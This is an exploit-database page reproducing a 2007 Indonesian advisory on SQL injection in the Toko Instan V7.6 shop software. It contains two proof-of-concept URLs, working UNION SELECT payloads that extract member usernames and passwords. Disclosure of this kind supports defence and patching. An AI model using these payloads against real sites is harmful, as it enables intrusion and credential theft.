header-logo
Suggest Exploit
vendor:
Toko Instan
by:
k1tk4t
7.5
CVSS
HIGH
Multiple Remote SQL Injection
CWE
Product Name: Toko Instan
Affected Version From: Toko Instan V7.6
Affected Version To: Toko Instan V7.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Toko Instan V7.6 – Multiple Remote SQL Injection Vulnerabilities

The 'id' variable in the 'artikel' section and the 'katid' variable in the 'produk' section are not properly filtered, allowing remote attackers to manipulate the SQL query through the browser.

Mitigation:

Properly filter and sanitize user input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Indonesian Newhack Security Advisory
# ------------------------------------
# Toko Instan V7.6 - Multiple Remote SQL Injection Vulnerabilities
# Waktu			:  Nov 14 2007 08:30AM
# Software		:  Toko Instan V7.6
# Vendor		:  http://www.tokohandal.com/
# Demo Site		:  http://www.tokohandal.com/demo/demo2.php
# Ditemukan oleh	:  k1tk4t  |  http://newhack.org
# Lokasi		:  Indonesia
#

// Kutu Pada Berkas "index.php"
- variabel "id" pada "artikel" tidak terfilter dengan baik sebelumnya sehingga user dapat memanipulasi sql query melalui browser secara remote
POC ;
http://korban.site/index.php?cm=artikel&cp=show&id=-1/**/union/**/select/**/null,null,null,null,null,userid,password,null,null/**/from/**/member/*

- variable "katid" pada "produk" tidak terfilter dengan baik sebelumnya sehingga user dapat memanipulasi sql query melalui browser secara remote
POC ;
http://korban.site/index.php?cm=produk&cp=show&katid=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,concat(userid,0x3a,password)/**/from/**/member/*

# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron
# nyubi,iFX,kin9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
# dan terkhusus untuk mas ghoz, selamat jalan sahabat|rekan jangan lupakan kami disana, kami selalu menanti kedatangan mas ghoz dengan suka cita  :) 

# milw0rm.com [2007-11-14]

Navigation

Suggest Exploit

Services By CQR